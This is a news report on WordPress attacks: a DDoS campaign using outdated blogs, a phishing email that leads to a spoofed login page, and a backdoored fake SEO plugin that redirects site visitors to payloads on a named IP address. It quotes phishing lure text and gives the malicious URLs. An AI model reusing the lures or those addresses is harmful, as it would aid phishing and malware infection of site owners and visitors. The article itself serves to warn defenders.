The Hacker News has analyzed the log files from the forum victim's server and found "many Wordpress CMS based educational (EDU) and government (GOV) websites from where the attack was originated." It says that more than 100,000 IP addresses were involved in the attack, and "the victim's Forum website received more than 40,000 requests in 7 minutes from different WordPress blogs and IP addresses." Among those websites it found more than 4000 EDU and GOV sites, including, for example, open.nasa.gov and tech.journalism.cuny.edu.
For this attack, suggests Hacker News, "thousands of outdated legitimate Wordpress blogs were abused to perform DDoS attacks using previously known vulnerabilities." It is important, therefore, for WordPress users to keep their software up to date. But care must still be taken. Reports are suggesting that this need to be patched is being exploited by phishers.
Mickey Mellen warned on the Google+ social network, "There's a fancy new WordPress-based phishing scheme going around that you need to be aware of." Complete with screenshots, he explains that it starts with an email saying, "Your Wordpress database is out-of-date, and must be upgraded now." The update link leads to a spoofed WordPress login screen actually hosted on howsagoin.nl. If the user enters any login details, they're lost – but to allay suspicions, that user is then redirected to the official WordPress upgrade page.
Now Securi has described a different campaign. This one takes advantage of the season of goodwill and giving. The email states, "You have been chosen by Wordpress to take part in our Customer Rewarding Program. You are the 23rd from 100 unique winners." The reward is a free copy, usually costing $79.00, of the "#1 most downloaded WordPress plugin:" the 'All in One SEO Pack Pro.'
Securi accepted the invitation and downloaded the plugin. "It looks exactly like the original 'All in One SEO pack' plugin," wrote Securi CTO Daniel Cid in a company blog, "except that they added a backdoor to the file aioseop_class.php." That backdoor allows the attackers to modify the site's index.php page. "Once your index.php has been modified, the bad guys can start to display malicious content to anyone visiting the compromised site," says Cid.
The attack then focuses on the website's visitors. "From there it forces the user's browser to download more content from http://91.239.15.61/google.js, and http://91.239.15.61/g.php, redirecting the user to SPAM (porn) sites, or to exploit kits where it will try to compromise the visitor further."
"When all else fails," warns Securi, "the bad guys can always rely on some basic social engineering tactics with a little hit of phishing!!